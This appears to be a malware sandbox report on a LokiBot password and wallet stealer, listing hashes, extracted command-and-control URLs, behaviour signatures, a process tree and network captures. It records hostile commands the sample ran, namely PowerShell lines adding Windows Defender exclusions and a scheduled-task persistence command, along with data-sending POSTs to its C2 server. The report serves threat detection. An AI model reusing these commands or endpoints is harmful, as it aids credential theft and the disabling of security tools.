Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/05/2024, 11:16 UTC

General

  • Target

    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe

  • Size

    557KB

  • MD5

    92bb15f033596b58c278b601da671d65

  • SHA1

    b3e4a2be1c5c616c7e63a3ad9f00b4423bb96dfa

  • SHA256

    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803

  • SHA512

    e470f8965a5a2a406f61ccb34daf0faa4f7f60245568274fde3934b485daa4bff70ea4e4fa98118d4ccf31b3d6be857df115d3a49ad07a1ad4f2d04e981ed2cc

  • SSDEEP

    6144:iaNrMItStH3JMYI4yVnEMn+OUCkCpzZCNmmZHJHxfI7r798qnu90OWF1KBk6GxjI:DNIF2V9dSpHhyE92KB8x+eLhVxBkR

Malware Config

Extracted

Family

lokibot

C2

http://rocheholding.top/evie3/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    "C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4724
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pczshAYpTd.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1892
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pczshAYpTd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp786C.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:2244
    • C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
      "C:\Users\Admin\AppData\Local\Temp\a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2128

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    rocheholding.top
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    8.8.8.8:53
    Request
    rocheholding.top
    IN A
    Response
    rocheholding.top
    IN A
    172.67.165.74
    rocheholding.top
    IN A
    104.21.65.180
  • flag-us
    POST
    http://rocheholding.top/evie3/five/fre.php
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    172.67.165.74:80
    Request
    POST /evie3/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: rocheholding.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 21507074
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 522
    Date: Wed, 29 May 2024 11:17:22 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BynFwzDbKHLePysMNygi0Hu0zhi6zt3xgofxvKZu01pmclwBplqKuzk%2FXRXOWz3aLxLu7pNFG4eEjOaPC8pd4WAbFgXtxDUcuDqVJaMTC3gkjLXmmcQDrIxpExAg3sWUfdfz"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 88b612eda80952e7-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
  • flag-nl
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.168:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Wed, 29 May 2024 11:16:39 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.6d3d3e17.1716981399.7bb14f5
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
    Response
    168.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-168deploystaticakamaitechnologiescom
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    168.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    74.165.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.165.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    74.165.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.165.67.172.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
  • flag-us
    POST
    http://rocheholding.top/evie3/five/fre.php
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    172.67.165.74:80
    Request
    POST /evie3/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: rocheholding.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 21507074
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 522
    Date: Wed, 29 May 2024 11:18:02 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QWgAi90AF2cE6Lq0gBJTLBYwEQzh%2BACziMpjQGfyMzwgX1DoOgyfD7XXJsSqXwG3ufqHrTU9yfB%2F7oSCXKgJvqlS3eyGzaqWxd%2BWWU4wnv6I3z8%2B9kzN0Q1e6qYxi96bX75h"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 88b613e41f4388c1-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    25.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.24.18.2.in-addr.arpa
    IN PTR
    Response
    25.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-25deploystaticakamaitechnologiescom
  • flag-us
    DNS
    18.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.24.18.2.in-addr.arpa
    IN PTR
    Response
    18.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-18deploystaticakamaitechnologiescom
  • flag-us
    POST
    http://rocheholding.top/evie3/five/fre.php
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Remote address:
    172.67.165.74:80
    Request
    POST /evie3/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: rocheholding.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 21507074
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 522
    Date: Wed, 29 May 2024 11:18:41 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbQSNfWjmm%2BTD3%2BwQ1PgKanWWJQETm%2BGRvFqb2dTg6m4NpgTMHHNGUcUlJaYbiC17J0OzgDfSSumngIs5i5YjZqZIweo%2BdBwH8Mh53mlep7GpvIm0Rj%2B7s2ZXDOCn%2Bm3%2FNXx"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 88b614d76eb863ea-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 69191AE062A64483B479E00A4F874ED5 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AD2A9C1817804AB19A44784451378982 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 638730
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D94E1C85870C4A30B5663A6B5588AC83 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 555746
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 88358800EA0740558FFB04F52AB653B1 Ref B: LON04EDGE1215 Ref C: 2024-05-29T11:18:18Z
    date: Wed, 29 May 2024 11:18:17 GMT
  • 172.67.165.74:80
    http://rocheholding.top/evie3/five/fre.php
    http
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    1.1kB
    998 B
    10
    6

    HTTP Request

    POST http://rocheholding.top/evie3/five/fre.php

    HTTP Response

    522
  • 23.62.61.168:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.4kB
    6.4kB
    16
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 172.67.165.74:80
    http://rocheholding.top/evie3/five/fre.php
    http
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    944 B
    964 B
    6
    5

    HTTP Request

    POST http://rocheholding.top/evie3/five/fre.php

    HTTP Response

    522
  • 172.67.165.74:80
    http://rocheholding.top/evie3/five/fre.php
    http
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    670 B
    1.0kB
    6
    6

    HTTP Request

    POST http://rocheholding.top/evie3/five/fre.php

    HTTP Response

    522
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    13
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    13
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    73.1kB
    2.1MB
    1539
    1532

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    rocheholding.top
    dns
    a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    62 B
    94 B
    1
    1

    DNS Request

    rocheholding.top

    DNS Response

    172.67.165.74
    104.21.65.180

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    213 B
    157 B
    3
    1

    DNS Request

    57.169.31.20.in-addr.arpa

    DNS Request

    57.169.31.20.in-addr.arpa

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    168.61.62.23.in-addr.arpa
    dns
    355 B
    135 B
    5
    1

    DNS Request

    168.61.62.23.in-addr.arpa

    DNS Request

    168.61.62.23.in-addr.arpa

    DNS Request

    168.61.62.23.in-addr.arpa

    DNS Request

    168.61.62.23.in-addr.arpa

    DNS Request

    168.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    360 B
    5

    DNS Request

    241.150.49.20.in-addr.arpa

    DNS Request

    241.150.49.20.in-addr.arpa

    DNS Request

    241.150.49.20.in-addr.arpa

    DNS Request

    241.150.49.20.in-addr.arpa

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    288 B
    158 B
    4
    1

    DNS Request

    28.118.140.52.in-addr.arpa

    DNS Request

    28.118.140.52.in-addr.arpa

    DNS Request

    28.118.140.52.in-addr.arpa

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    74.165.67.172.in-addr.arpa
    dns
    144 B
    134 B
    2
    1

    DNS Request

    74.165.67.172.in-addr.arpa

    DNS Request

    74.165.67.172.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    360 B
    146 B
    5
    1

    DNS Request

    157.123.68.40.in-addr.arpa

    DNS Request

    157.123.68.40.in-addr.arpa

    DNS Request

    157.123.68.40.in-addr.arpa

    DNS Request

    157.123.68.40.in-addr.arpa

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    213 B
    145 B
    3
    1

    DNS Request

    206.23.85.13.in-addr.arpa

    DNS Request

    206.23.85.13.in-addr.arpa

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    25.24.18.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    25.24.18.2.in-addr.arpa

  • 8.8.8.8:53
    18.24.18.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    18.24.18.2.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    20e94c6501751ea49524b26d8fe86a29

    SHA1

    401d47819e8c19ec5194883bbf11aa990ee7df51

    SHA256

    46c9f1e777c504bddc199833473785365bee2af9611bc662168d1ab9141137c4

    SHA512

    39387884ccd1cc304fe8106c9729113c331333310f763bcd7d9fa4ead0fd726397bd010e2b637dfe938b7f1080cd16cfb3a38503d4d234b82b600890b810836c

